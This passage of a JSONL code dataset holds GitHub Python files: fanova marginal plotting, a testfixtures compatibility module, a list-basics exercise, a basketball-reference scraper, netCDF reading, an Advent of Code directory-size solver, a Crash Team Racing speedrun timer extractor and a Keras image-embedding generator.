\"\"\"\n Creates marginals of a selected parameter for own plots\n\n Parameters\n ------------\n param: int or str\n Index of chosen parameter in the ConfigSpace (starts with 0)\n\n resolution: int\n Number of samples to generate from the parameter range as\n values to predict\n\n \"\"\"\n if type(param) == str:\n param = self.cs.get_idx_by_hyperparameter_name(param)\n if isinstance(self.cs_params[param], (CategoricalHyperparameter, Constant)):\n param_name = self.cs_params[param].name\n try:\n labels= self.cs_params[param].choices\n categorical_size = len(self.cs_params[param].choices)\n except AttributeError:\n labels = str(self.cs_params[param])\n categorical_size = 1\n marginals = [self.fanova.marginal_mean_variance_for_values([param], [i]) for i in range(categorical_size)]\n mean, v = list(zip(*marginals))\n std = np.sqrt(v)\n return mean, std\n\n else:\n lower_bound = self.cs_params[param].lower\n upper_bound = self.cs_params[param].upper\n log = self.cs_params[param].log\n if log:\n # JvR: my conjecture is that ConfigSpace uses the natural logarithm\n base = np.e\n log_lower = np.log(lower_bound) / np.log(base)\n log_upper = np.log(upper_bound) / np.log(base)\n grid = np.logspace(log_lower, log_upper, resolution, endpoint=True, base=base)\n '''\n if abs(grid[0] - lower_bound) > 0.00001:\n raise ValueError()\n if abs(grid[-1] - upper_bound) > 0.00001:\n raise ValueError()\n '''\n else:\n grid = np.linspace(lower_bound, upper_bound, resolution)\n mean = np.zeros(resolution)\n std = np.zeros(resolution)\n\n dim = [param]\n for i in range(0, resolution):\n (m, v) = self.fanova.marginal_mean_variance_for_values(dim, [grid[i]])\n mean[i] = m\n std[i] = np.sqrt(v)\n return mean, std, grid\n\n def plot_marginal(self, param, resolution=100, log_scale=None, show=True,\n incumbents=None):\n \"\"\"\n Creates a plot of marginal of a selected parameter\n\n Parameters\n ------------\n param: int or str\n Index of chosen parameter in the ConfigSpace (starts with 0)\n\n resolution: int\n Number of samples to generate from the parameter range as\n 
values to predict\n\n log_scale: boolean\n If log scale is required or not. If no value is given, it is\n deduced from the ConfigSpace provided\n\n show: boolean\n whether to call plt.show() to show plot directly as interactive matplotlib-plot\n\n incumbents: List[Configuration]\n list of ConfigSpace.Configurations that are marked as incumbents\n \"\"\"\n param_idx = param\n if type(param_idx) == str:\n param_idx = self.cs.get_idx_by_hyperparameter_name(param_idx)\n param_name = self.cs_params[param_idx].name\n\n # check if categorical\n if isinstance(self.cs_params[param_idx], (CategoricalHyperparameter, Constant)):\n # PREPROCESS\n try:\n labels = self.cs_params[param_idx].choices\n categorical_size = len(self.cs_params[param_idx].choices)\n except AttributeError:\n labels = str(self.cs_params[param_idx])\n categorical_size = 1\n indices = np.arange(1, categorical_size+1, 1)\n mean, std = self.generate_marginal(param_idx)\n min_y = mean[0]\n max_y = mean[0]\n\n # PLOT\n b = plt.boxplot([[x] for x in mean])\n plt.xticks(indices, labels)\n # blow up boxes\n for box, std_ in zip(b[\"boxes\"], std):\n y = box.get_ydata()\n y[2:4] = y[2:4] + std_\n y[0:2] = y[0:2] - std_\n y[4] = y[4] - std_\n box.set_ydata(y)\n min_y = min(min_y, y[0] - std_)\n max_y = max(max_y, y[2] + std_)\n\n plt.ylim([min_y, max_y])\n\n plt.ylabel(self._y_label)\n plt.xlabel(param_name)\n plt.tight_layout()\n\n else:\n\n # PREPROCESS\n mean, std, grid = self.generate_marginal(param_idx, resolution)\n mean = np.asarray(mean)\n std = np.asarray(std)\n\n lower_curve = mean - std\n upper_curve = mean + std\n\n if log_scale is None:\n log_scale = self.cs_params[param_idx].log or (np.diff(grid).std() > 0.000001)\n\n # PLOT\n if log_scale:\n if (np.diff(grid).std() > 0.000001):\n self.logger.info(\"It might be better to plot this parameter\"\n \" '%s' in log-scale.\", param_name)\n plt.semilogx(grid, mean, 'b', label='predicted %s' % self._y_label)\n else:\n plt.plot(grid, mean, 'b', label='predicted %s' % self._y_label)\n plt.fill_between(grid, upper_curve, lower_curve, facecolor='red',\n alpha=0.6, label='std')\n\n if incumbents is not None:\n if not isinstance(incumbents, list):\n incumbents = [incumbents]\n values = [inc[param_name] for inc in incumbents if param_name in inc and inc[param_name] is not None]\n indices = [(np.abs(np.asarray(grid) - val)).argmin() for val in values]\n if len(indices) > 0:\n plt.scatter(list([grid[idx] for idx in indices]),\n list([mean[idx] for idx in indices]),\n label='incumbent', c='black', marker='.', zorder=999)\n\n plt.xlabel(param_name)\n plt.ylabel(self._y_label)\n plt.grid(True)\n plt.legend()\n plt.tight_layout()\n\n if show:\n plt.show()\n else:\n return plt\n\n def create_most_important_pairwise_marginal_plots(self, params=None, n=20, three_d=True):\n \"\"\"\n Creates plots of the n most important pairwise marginals of the whole ConfigSpace\n\n Parameters\n ------------\n params: list\n Contains the selected parameters for pairwise evaluation\n n: int\n The number of most relevant pairwise marginals that will be returned\n three_d: boolean\n whether or not to plot pairwise marginals in 3D-plot\n\n \"\"\"\n if self.fanova._dict:\n most_important_pairwise_marginals = self.fanova.tot_imp_dict\n else:\n if params is not None:\n most_important_pairwise_marginals = self.fanova.get_most_important_pairwise_marginals(params=params)\n else:\n most_important_pairwise_marginals = self.fanova.get_most_important_pairwise_marginals(n=n)\n\n for param1, param2 in most_important_pairwise_marginals:\n 
param1, param2 = self.cs.get_idx_by_hyperparameter_name(param1), self.cs.get_idx_by_hyperparameter_name(param2)\n param_names = [self.cs_params[param1].name, self.cs_params[param2].name]\n param_names = str(param_names)\n param_names = re.sub('[!,@#\\'\\n$\\[\\]]', '', param_names)\n outfile_name = os.path.join(self.directory, str(param_names).replace(\" \",\"_\") + \".png\")\n self.logger.info(\"creating %s\" % outfile_name)\n self.plot_pairwise_marginal((param1, param2), show=False, three_d=three_d)\n plt.savefig(outfile_name)\n\n","repo_name":"heungseok/fanova","sub_path":"fanova/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":18252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"91"}
+{"seq_id":"30422630165","text":"import doctest\nimport manuel\nimport re\nimport sys\nimport textwrap\n\nfrom manuel.codeblock import (\n CODEBLOCK_START,\n CODEBLOCK_END,\n CodeBlock,\n execute_code_block,\n )\n\n# version markers\n\nfrom ..compat import PY2 as py_2\npy_33_plus = sys.version_info[:2] >= (3, 3)\npy_34_plus = sys.version_info[:2] >= (3, 4)\npy_35_plus = sys.version_info[:2] >= (3, 5)\n\n# Python 2.7 compatibility stuff\n\nBYTE_LITERALS = re.compile(\"^b('.*')$\", re.MULTILINE)\n\n\ndef find_code_blocks(document):\n for region in document.find_regions(CODEBLOCK_START, CODEBLOCK_END):\n start_end = CODEBLOCK_START.search(region.source).end()\n source = textwrap.dedent(region.source[start_end:])\n if py_2:\n source = BYTE_LITERALS.sub('\\\\1', source)\n source = 'from __future__ import print_function\\n' + source\n source_location = '%s:%d' % (document.location, region.lineno)\n code = compile(source, source_location, 'exec', 0, True)\n document.claim_region(region)\n region.parsed = CodeBlock(code, source)\n\n\nclass Manuel(manuel.Manuel):\n def __init__(self):\n manuel.Manuel.__init__(self, [find_code_blocks], [execute_code_block])\n\n\nif py_2:\n class DocTestChecker(doctest.OutputChecker):\n def check_output(self, want, got, optionflags):\n want = BYTE_LITERALS.sub('\\\\1', want)\n return doctest.OutputChecker.check_output(\n self, want, got, optionflags\n )\nelse:\n DocTestChecker = doctest.OutputChecker\n","repo_name":"stuckyb/ontopilot","sub_path":"python-src/test/testfixtures/tests/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"91"}
+{"seq_id":"19600641802","text":"# [] square brackets denote a list\n\nletters = [\"a\", \"b\", \"c\"]\nmatrix = [[0, 1], [2, 3]]\nzeros = [0] * 5\ncombined = zeros + letters\nnumbers = list(range(20))\nchars = list(\"Hello World\")\nprint(chars)\nprint(len(chars))\nprint(chars.index(\"o\",chars.index(\"o\")+1))","repo_name":"sipakhti/code-with-mosh-python","sub_path":"Data Structure/Lists.py","file_name":"Lists.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"22538570870","text":"import os\nfrom bs4 import BeautifulSoup\nfrom playwright.sync_api import sync_playwright, TimeoutError as PlaywrightTimeout\nimport time\n\n\nSEASONS = list(range(2016, 2023))\nDATA_DIR = \"data\"\nSTANDINGS_DIR = os.path.join(DATA_DIR, \"standings\")\nSCORES_DIR = os.path.join(DATA_DIR, \"scores\")\n\nasync def get_html(url, selector, sleep=5, retries=3):\n html = None\n for i in range(1, retries+1): \n time.sleep(sleep*i)\n\n try: \n with sync_playwright() as p: \n browser = await p.chromium.launch()\n page = await browser.new_page()\n page.goto(url)\n print(await page.title())\n html = await page.inner_html(selector)\n\n except PlaywrightTimeout:\n print(f\"Timeourt error {url}\")\n continue\n\n else:\n break \n return html\n\nseason = 2016\nurl = f\"https://www.basketball-reference.com/leagues/NBA_{season}_games.html\"\n\nhtml = get_html(url, \"#content .filter\")\n\nprint(html)\n\n#soup = BeautifulSoup(html)\n#links = soup.find_all(\"a\")\n#href = [l[\"href\"] for l in links]\n\n","repo_name":"michaelzwartz/Unsupervised-ML","sub_path":"NBA Predictions/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"43346753836","text":"import netCDF4 as nc\nimport numpy as np\n\nfN = '/home/ssilje/PYTHON_course/pyvis/data/HadEX2_GSL.nc'\n\n\nncf = nc.Dataset(fN)\n\nprint(ncf)\n\n# get all variables\nprint(ncf.variables.keys())\n\n# get a variable from the file\nncf.variables['lon']\n\n\n\nncf.variables['time'].units\n\n\n# get data of lon from the file\nlon = ncf.variables['lon'][:]\n# this is a numpy array\nlon\n\n\n# get data of lat from the file \nlat = ncf.variables['lat'][:]\n# this is a numpy array \nlat\n\n\n# load the trend\ntrend_masked = ncf.variables['trend'][:]\n\ntrend_masked\n\n\n# example\n\nma = np.ma.array([0., 1, 2], mask=[True, False, False], fill_value=np.NaN)\nma\n\n\n\nimport xarray as xr\n\nimport numpy as np\n\n\n\n\nds = xr.open_dataset(fN)\n\nds\n\n\nlat = ds['lat']\nlat[:10]\n\n\nlon = ds.lon\nlon[:10]\n\n\nlat = ds.lat\nlat[:10]\n\n\nlat.values[:10]\n\nprint(np.asarray(lat)[:10])\n\n","repo_name":"ssilje/PYTHON_course","sub_path":"PYTHON_course/read_netcdf.py","file_name":"read_netcdf.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"10242540526","text":"#! /usr/bin/python3\nimport sys\n\n\nclass Dir:\n def __init__(self, name, parent=None):\n self.name = name\n self.parent = parent\n self.subdirs = []\n self.files = []\n\n @property\n def size(self):\n return sum(d.size for d in self.subdirs + self.files)\n\n def walk(self):\n yield self\n for subdir in self.subdirs:\n yield from subdir.walk()\n\n\nclass File:\n def __init__(self, name, size):\n self.name = name\n self.size = size\n\n\ndef parse_input(path):\n root = Dir('/')\n cwd = root\n for line in open(path):\n line = line.strip()\n if line.startswith('$ cd '):\n target = line[len('$ cd '):]\n if target == '..':\n cwd = cwd.parent\n elif target == '/':\n cwd = root\n else:\n cwd = [d for d in cwd.subdirs if d.name == target][0]\n elif not line.startswith('$'):\n attr, name = line.split()\n if attr == 'dir':\n cwd.subdirs.append(Dir(name, cwd))\n else:\n cwd.files.append(File(name, int(attr)))\n return root\n\n\ndef main(input_file):\n tree = parse_input(input_file)\n\n small_dirs = [d for d in tree.walk() if d.size <= 100000]\n print(\"Part 1:\", sum(d.size for d in small_dirs))\n\n req_space = 30000000 - (70000000 - tree.size)\n candidates = [d for d in tree.walk() if d.size >= req_space]\n candidates.sort(key=lambda d: d.size)\n print(\"Part 2:\", candidates[0].size)\n\n\nif __name__ == '__main__':\n main(sys.argv[1])\n","repo_name":"davearussell/advent2022","sub_path":"day07/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"}
+{"seq_id":"2521702688","text":"import cv2\nimport numpy as np\nimport pickle\nfrom pywinauto import application\n\nfrom imageProcessing import *\n\ndef in_range(n, a, b):\n ''' Checks if number is n in ]a, b[ '''\n\n if n > a and n < b:\n return True\n return False\n\ndef mean_hsv(v):\n ''' Calculates the mean color of a HSV picture.\n @param v: cv2 HSV picture. '''\n\n mean = 0\n for i in range(len(v)):\n for j in range(len(v[i])):\n mean += v[i][j][0]\n return mean / (len(v) * len(v[0]))\n\ndef load_video(file_path):\n ''' Opens a video using OpenCV2 library.\n @param file_path: path of the video file.'''\n\n # Loading the speedrun\n video = cv2.VideoCapture(file_path)\n # Reading the first frame for the first time\n status, original_frame = video.read()\n # Creating a grayscale copy\n frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2GRAY)\n # Getting information about the original height and width\n height, width = frame.shape\n\n return video, original_frame, frame, height, width\n\ndef close_video(video):\n ''' Closes a OpenCV2 video, as well as any cv2 window opened.\n @param video: cv2 video. '''\n\n video.release()\n cv2.destroyAllWindows()\n\ndef crop_video(file_path):\n ''' This function executes an user interface responsible for\n cropping the video file.\n @param file_path: path of the video file. '''\n\n video, original_frame, _, height, width = load_video(file_path)\n window_name = \"Crop the game\"\n\n # The idea is to bring the OpenCV2 window to focus\n # However, there's no native way of doing it inside OpenCV2's library\n # To achieve the same result, there's a hacky way using pywinauto\n # If I create a blank window, I can search for its name and focus it\n\n # Setting this blank window on focus\n app = application.Application()\n cv2.namedWindow(window_name, cv2.WINDOW_NORMAL)\n app.connect(title_re=window_name)\n app_dialog = app.top_window()\n app_dialog.minimize()\n app_dialog.restore()\n\n # The blank window always gets maximized when focused again.\n # To fix that, for some reason destroying the opencv2 window and\n # creating a new one will fix the window resolution, and also\n # create a new window already focused\n cv2.destroyAllWindows()\n\n # Values used to store the sub-window of the video window\n h1, h2, w1, w2 = 0, height, 0, width\n\n # Loop until user is done with cropping the speedrun\n done = False\n while not done:\n\n # Reset the video window to its original size\n h1, h2, w1, w2 = 0, height, 0, width\n while True:\n\n # Displays the updated version of the video file\n cv2.imshow(window_name, original_frame[h1:h2, w1:w2])\n key = cv2.waitKey(0) & 0xFF\n\n # User can crop the video file by using the keys WASD\n if key == ord('a') or key == ord('A'):\n w1 += 1\n if key == ord('w') or key == ord('W'):\n h1 += 1\n if key == ord('s') or key == ord('S'):\n h2 -= 1\n if key == ord('d') or key == ord('D'):\n w2 -= 1\n\n # User can quit the program using Q\n if key == ord('q') or key == ord('Q'):\n video.release()\n cv2.destroyAllWindows()\n quit()\n\n # User can reset the video window by pressing ESC\n if key == 27:\n cv2.destroyWindow(window_name)\n break\n\n # Pressing ENTER submits the cropping\n if key == 10 or key == 13:\n done = True\n cv2.destroyWindow(window_name)\n break\n\n close_video(video)\n\n return h1, h2, w1, w2\n\ndef process_video(file_path, h1, h2, w1, w2, version, category, stdscr):\n\n # Constants\n NUMBER_ONE_COORD = (\n (25, 35, 75, 85), # NTSC-U\n (30, 40, 75, 85), # PAL\n (25, 35, 75, 85), # NTSC-J\n )\n DIGIT_COORD = (\n ((10, 
24), (9, 23), (10, 24)), # First digit; NTSC-U, PAL, NTSC-J\n ((35, 48), (32, 45), (30, 43)), # Second digit; NTSC-U, PAL, NTSC-J\n ((50, 63), (44, 57), (43, 56)), # Third digit; NTSC-U, PAL, NTSC-J\n ((74, 87), (65, 78), (64, 77)), # Fourth digit; NTSC-U, PAL, NTSC-J\n ((89, 102), (76, 91), (77, 90)), # Fifth digit; NTSC-U, PAL, NTSC-J\n )\n ROW_COORD = (\n (6, 28, 6, 28, 6, 28), # NTSC-U\n (5, 26, 4, 25, -1, 20), # PAL\n (6, 28, 6, 28, 6, 28), # NTSC-J\n )\n GAME_SIZE = (435, 323)\n X_BUTTON_COORD = (\n (290, 300, 170, 180), # NTSC-U\n (280, 290, 170, 180), # PAL\n (290, 300, 170, 180), # NTSC-J\n )\n IGT_COORD = (\n (10, 103, 288, 420), # NTSC-U\n (10, 93, 288, 407), # PAL\n (10, 103, 288, 420), # NTSC-J\n )\n HEIGHT_FIX = 0\n WIDTH_FIX = 0\n\n # Load video\n video, original_frame, frame, height, width = load_video(file_path)\n # Saving cropped frame\n original_frame = original_frame[h1:h2, w1:w2]\n # Saving cropped grayscale copy\n frame = frame[h1:h2, w1:w2]\n # Resize to match pixel positions\n original_frame = cv2.resize(original_frame, GAME_SIZE)\n frame = cv2.resize(frame, GAME_SIZE)\n # Update height and width\n height, width = frame.shape\n # Load machine learning model to predict the CTR digits\n model = pickle.load(open(\"CTR_digits.knn\", 'rb'))\n # Variable that adjusts the cropping in the first race\n first_race = True\n # Variables to store the returning values\n igt = []\n times = []\n\n # Time set to ignore impossible frames between races, loads and hub movement\n timeout = 2100\n # Setting number of races of the speedrun\n num_races = 0\n if category == 0:\n num_races = 21\n elif category == 1:\n num_races = 16\n\n # Number of in game time screens found in the game\n igt_found = 0\n\n # While there are still in game time screens to be found\n while igt_found < num_races:\n\n # If you're in a timeout, ignore the frames\n if timeout > 0:\n status, original_frame = video.read()\n timeout -= 1\n # If the timeout is over\n if timeout == 0:\n # Apply transformations, since the last frame of the timeout\n # will be checked in the next iteration\n original_frame = original_frame[h1:h2, w1:w2]\n frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2GRAY)\n # Resize to match pixel positions\n original_frame = cv2.resize(original_frame, GAME_SIZE)\n frame = cv2.resize(frame, GAME_SIZE)\n continue\n\n # If the screen flashed white, the next frames may contain an in game time screen\n if np.mean(frame[0:50, 0:50]) > 200 and np.mean(frame[height - 50 : height, width - 50 : width]) > 200:\n\n # Store possible in game time images\n cache = []\n\n has_checked = False\n frame_window = 10\n # Check the next frames in the frame_window\n while True:\n\n # Crop the area of the blue X button\n x_continue = original_frame[X_BUTTON_COORD[version][0] : X_BUTTON_COORD[version][1], X_BUTTON_COORD[version][2] : X_BUTTON_COORD[version][3]]\n # Transform to HSV, so we can measure how blue the image is\n x_continue_hsv = cv2.cvtColor(x_continue, cv2.COLOR_BGR2HSV_FULL)\n # Calculate the mean value of the \"h\" (color)\n x_mean = mean_hsv(x_continue_hsv)\n\n # Crop the area of the top of the \"1\" number\n number_one = original_frame[NUMBER_ONE_COORD[version][0]: NUMBER_ONE_COORD[version][1], NUMBER_ONE_COORD[version][2] : NUMBER_ONE_COORD[version][3]]\n # Transform to HSV, so we can measure how yellow the image is\n number_one_hsv = cv2.cvtColor(number_one, cv2.COLOR_BGR2HSV_FULL)\n # Calculate the mean value of the \"h\" (color)\n one_mean = mean_hsv(number_one_hsv)\n\n # If the average color of the x 
button is blue enough AND\n # the average color of the top of the \"1\" is yellow enough\n if in_range(x_mean, 150, 200) and in_range(one_mean, 25, 55):\n\n # You found a finish level screen\n # Add the IGT crop to the cache\n cache.append(frame[IGT_COORD[version][0] : IGT_COORD[version][1], IGT_COORD[version][2] : IGT_COORD[version][3]])\n\n status, original_frame = video.read()\n # Checking end of video\n if status == False:\n break\n\n # Read new frame, crop and make a grayscale copy\n original_frame = original_frame[h1:h2, w1:w2]\n frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2GRAY)\n # Resize to match pixel positions\n original_frame = cv2.resize(original_frame, GAME_SIZE)\n frame = cv2.resize(frame, GAME_SIZE)\n\n frame_window -= 1\n # If you've checked every frame\n if frame_window == 0:\n\n # If you already checked the next ten seconds, you're done in this loop\n if has_checked:\n break\n\n # If you found an IGT match, you're done in this loop\n if len(cache) > 0:\n break\n\n # If you didn't, check the next ten seconds,\n # since some people may wait in the end without mashing X\n frame_window = 300\n has_checked = True\n\n # If you found any possible IGT match\n if (len(cache) > 0):\n\n # Find the \"darkest\" IGT image\n minimum = 160\n for img in cache:\n if np.mean(img) < minimum and np.mean(img) > 70:\n minimum = np.mean(img)\n in_game_time = img\n\n # Set a timeout, you won't need to check end of race in the next 1:10\n timeout = 2100\n # Increase the number of IGT screens found\n igt_found += 1\n # Update the progress to the user\n stdscr.addstr(igt_found, 0, str(igt_found)+\"/\"+str(num_races)+\" IGT screens found.\")\n stdscr.refresh()\n\n # Crop the rows from the IGT screen\n rows = []\n for i in range(3):\n # Variables to adjust the height of the rows\n HEIGHT_FIX = 0\n fixed_height = False\n\n while True:\n\n # Crop the row\n row = in_game_time[26 * i + HEIGHT_FIX + ROW_COORD[version][2 * i] : 26 * i + HEIGHT_FIX + ROW_COORD[version][2 * i + 1], 0:]\n # Crop the first digit of the row and process it\n digit = row[0:, WIDTH_FIX + DIGIT_COORD[0][version][0] : WIDTH_FIX + DIGIT_COORD[0][version][1]]\n digit = cv2.resize(digit, DIGIT_SIZE)\n digit = process_digit(digit)\n\n # The idea is to measure the distance from the borders of the\n # digit to the first non black pixels of the number, and then\n # try to align the number. 
Width check is only done on the\n # very first race, since having a 1 minute start lap will break\n # this alignment algorithm.\n # This fixes small misalignment in different capture card outputs\n\n if not first_race:\n # Calculating the distance from the up and down sides\n dist_up = DIGIT_HEIGHT\n dist_down = DIGIT_HEIGHT\n for y in range(DIGIT_WIDTH):\n visited_up = False\n visited_down = False\n for x in range(DIGIT_HEIGHT):\n if not visited_down and digit[DIGIT_HEIGHT - x - 1, y] != BLACK:\n dist_down = min(dist_down, x)\n visited_down = True\n\n if not visited_up and digit[x, y] != BLACK:\n dist_up = min(dist_up, x)\n visited_up = True\n\n if visited_down and visited_up:\n break\n\n # Getting the maximum distance, i.e. the side that needs\n # to be corrected\n temp = max(dist_up, dist_down)\n fixed_height = True\n # If the maximum distance is greater than this threshold\n if temp > 2:\n # Adjust the height when cropping the digits\n if temp == dist_up:\n HEIGHT_FIX = dist_up - 2\n else:\n HEIGHT_FIX = 2 - dist_down\n\n # If it's the first race, do a width check.\n # Same code as for the up and down sides, except that this time\n # we calculate the average distance of the pixels, instead of using\n # the very first non black pixel as the total distance.\n\n # I used different algorithms for the sides because they proved to\n # be more effective after testing with multiple runs.\n if first_race:\n first_race = False\n\n dist_right = DIGIT_WIDTH\n dist_left = DIGIT_WIDTH\n valid_right = 0\n valid_left = 0\n\n # Ignoring pixels too close to the border, since they usually are\n # always black, which messes up the average distance of the\n # pixels that represent the number\n\n for x in range(DIGIT_HEIGHT // 3, (DIGIT_HEIGHT * 2 // 3) + 1):\n visited_right = False\n visited_left = False\n for y in range(DIGIT_WIDTH // 2):\n if not visited_left and digit[x, DIGIT_WIDTH - 1 - y] != BLACK:\n dist_left += y\n valid_left += 1\n visited_left = True\n\n if not visited_right and digit[x, y] != BLACK:\n dist_right += y\n valid_right += 1\n visited_right = True\n\n if visited_left and visited_right:\n break\n\n # Calculating the average distance\n dist_right = dist_right // valid_right\n dist_left = dist_left // valid_left\n\n if dist_right > 2:\n WIDTH_FIX = dist_right - 2\n elif dist_left > 2:\n WIDTH_FIX = 2 - dist_left\n\n row = in_game_time[26 * i + HEIGHT_FIX + ROW_COORD[version][2 * i] : 26 * i + HEIGHT_FIX + ROW_COORD[version][2 * i + 1], 0:]\n\n if fixed_height:\n rows.append(row)\n break\n\n # List to store each predicted digit\n lap_times = []\n for i in range(3):\n for j in range(5):\n digit = rows[i][0:, WIDTH_FIX + DIGIT_COORD[j][version][0] : WIDTH_FIX + DIGIT_COORD[j][version][1]] \n # Resizing each digit to make them bigger,\n # and also make sure that they will have the same size for the KNN input.\n digit = cv2.resize(digit, DIGIT_SIZE_HIGH)\n # Process the digit before predicting\n digit = process_digit(digit)\n # Predict the number and store it\n n = model.predict(np.reshape(digit, (1, digit.shape[0] * digit.shape[1])))\n lap_times.append(n[0])\n\n # Storing final values\n times.append(lap_times)\n igt.append(in_game_time)\n\n # Read new frame, apply transformations and check the status of the video\n status, original_frame = video.read()\n if status == False:\n break\n original_frame = original_frame[h1:h2, w1:w2]\n frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2GRAY)\n\n # Resize to match pixel positions\n original_frame = cv2.resize(original_frame, GAME_SIZE)\n 
frame = cv2.resize(frame, GAME_SIZE)\n\n close_video(video)\n return times, igt","repo_name":"mateusfavarin/CTR-AutoIGT","sub_path":"src/videoProcessing.py","file_name":"videoProcessing.py","file_ext":"py","file_size_in_byte":17449,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"}
+{"seq_id":"2875190122","text":"import tensorflow as tf\r\nfrom tensorflow.keras.applications.vgg16 import VGG16, preprocess_input as preprocess_vgg16\r\nfrom tensorflow.keras.applications.resnet50 import ResNet50, preprocess_input as preprocess_resnet50\r\nfrom tensorflow.keras.applications.inception_v3 import InceptionV3, preprocess_input as preprocess_inceptionv3\r\nfrom tensorflow.keras.applications.mobilenet_v2 import MobileNetV2, preprocess_input as preprocess_mobilenetv2\r\nfrom tensorflow.keras.preprocessing import image\r\nimport numpy as np\r\nimport os\r\nimport json\r\navailable_models = ['mobilenetv2', 'vgg16', 'resnet50', 'inceptionv3']\r\nclass ImageEmbeddings:\r\n def __init__(self, model_name):\r\n self.model_name = model_name\r\n self.available_models = ['mobilenetv2', 'vgg16', 'resnet50', 'inceptionv3']\r\n self.model = self._load_model()\r\n\r\n def _load_model(self):\r\n if self.model_name in available_models:\r\n if self.model_name == 'vgg16':\r\n model = VGG16(weights='imagenet')\r\n self.preprocess_fn = preprocess_vgg16\r\n elif self.model_name == 'resnet50':\r\n model = ResNet50(weights='imagenet')\r\n self.preprocess_fn = preprocess_resnet50\r\n elif self.model_name == 'inceptionv3':\r\n model = InceptionV3(weights='imagenet')\r\n self.preprocess_fn = preprocess_inceptionv3\r\n elif self.model_name == 'mobilenetv2':\r\n model = MobileNetV2(weights='imagenet')\r\n self.preprocess_fn = preprocess_mobilenetv2\r\n else:\r\n raise ValueError('Invalid model name. Supported models: vgg16, resnet50, inceptionv3, mobilenetv2')\r\n return model\r\n\r\n def convert_to_embeddings(self, img_path):\r\n # Load and preprocess the image\r\n print(self.model.input_shape)\r\n img = image.load_img(img_path, target_size=(self.model.input_shape[1], self.model.input_shape[2]))\r\n x = image.img_to_array(img)\r\n x = np.expand_dims(x, axis=0)\r\n x = self.preprocess_fn(x)\r\n\r\n # Get the embeddings/features from the pre-trained model\r\n embeddings = self.model.predict(x)\r\n\r\n # The embeddings will be a 4D tensor, you can reshape it to 1D if needed\r\n embeddings = embeddings.flatten()\r\n\r\n return embeddings\r\n \r\ndef GenerateEmbeddings(img_path):\r\n Embeddings_dict = {}\r\n #Custom JSON encoder to handle NumPy arrays\r\n class NumpyArrayEncoder(json.JSONEncoder):\r\n def default(self, obj):\r\n if isinstance(obj, np.ndarray):\r\n return obj.tolist() # Convert NumPy array to Python list\r\n return json.JSONEncoder.default(self, obj)\r\n if os.path.exists(img_path):\r\n for model in available_models:\r\n embeddings = ImageEmbeddings(model)\r\n embeddings = embeddings.convert_to_embeddings(img_path)\r\n Embeddings_dict[model] = embeddings\r\n \r\n # Dump the dictionary to a JSON file\r\n filename = os.path.join(os.path.dirname(img_path),'embeddings.json' )\r\n json_str = json.dumps(Embeddings_dict, cls=NumpyArrayEncoder)\r\n with open(filename, 'w') as file:\r\n file.write(json_str)\r\n else:\r\n raise ValueError(f\"Could not find the image {img_path}\")\r\n return Embeddings_dict, filename\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n # # Create an instance of the ImageEmbeddings class for VGG16 model\r\n # embeddings_vgg16 = ImageEmbeddings('vgg16')\r\n\r\n # # Convert image to embeddings using VGG16\r\n img_path = 'C:\\Prajwal\\Generative Design\\sample_data_af\\S00UBY6-W1.png'\r\n # vgg16_embeddings = embeddings_vgg16.convert_to_embeddings(img_path)\r\n # print(\"VGG16 embeddings:\", vgg16_embeddings)\r\n\r\n # # Create an instance of the ImageEmbeddings class for 
ResNet50 model\r\n # embeddings_resnet50 = ImageEmbeddings('resnet50')\r\n\r\n # # Convert image to embeddings using ResNet50\r\n # resnet50_embeddings = embeddings_resnet50.convert_to_embeddings(img_path)\r\n # print(\"ResNet50 embeddings:\", resnet50_embeddings)\r\n\r\n # # Create an instance of the ImageEmbeddings class for InceptionV3 model\r\n # embeddings_inceptionv3 = ImageEmbeddings('inceptionv3')\r\n\r\n # # Convert image to embeddings using InceptionV3\r\n # inceptionv3_embeddings = embeddings_inceptionv3.convert_to_embeddings(img_path)\r\n # print(\"InceptionV3 embeddings:\", inceptionv3_embeddings)\r\n\r\n # # Create an instance of the ImageEmbeddings class for MobileNetV2 model\r\n # embeddings_mobilenetv2 = ImageEmbeddings('mobilenetv2')\r\n\r\n # # Convert image to embeddings using MobileNetV2\r\n # mobilenetv2_embeddings = embeddings_mobilenetv2.convert_to_embeddings(img_path)\r\n # print(\"MobileNetV2 embeddings:\", mobilenetv2_embeddings)\r\n\r\n print(GenerateEmbeddings(img_path))\r\n","repo_name":"Praj-17/Deep-Learning","sub_path":"Embeddings.py","file_name":"Embeddings.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
